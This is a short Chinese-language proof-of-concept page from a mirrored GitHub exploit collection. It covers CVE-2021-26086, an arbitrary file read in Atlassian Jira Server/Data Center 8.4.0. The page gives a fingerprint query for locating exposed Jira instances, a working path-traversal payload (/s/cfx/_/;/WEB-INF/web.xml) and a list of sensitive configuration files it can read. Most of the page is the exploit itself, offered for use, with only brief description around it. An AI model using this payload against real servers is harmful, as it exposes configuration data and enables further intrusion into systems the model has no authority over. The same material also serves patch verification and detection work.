admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086.md
Threekiii 11de4c1d47 update
2024-11-06 14:10:36 +08:00

45 lines
783 B
Markdown
Raw Blame History

# Atlassian Jira cfx 任意文件读取漏洞 CVE-2021-26086
## 漏洞描述
Atlassian Jira Server/Data Center 8.4.0 - Limited Remote File Read/Include
## 漏洞影响
```
Atlassian Jira Server/Data Center 8.4.0
```
## 网络测绘
```
app="ATLASSIAN-JIRA"
```
## 漏洞复现
登录页面
![](images/202205241424642.png)
验证POC
```
/s/cfx/_/;/WEB-INF/web.xml
```
![](images/202205241424545.png)
可读取敏感配置文件
```
WEB-INF/web.xml
WEB-INF/decorators.xml
WEB-INF/classes/seraph-config.xml
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
```
Reference in New Issue View Git Blame Copy Permalink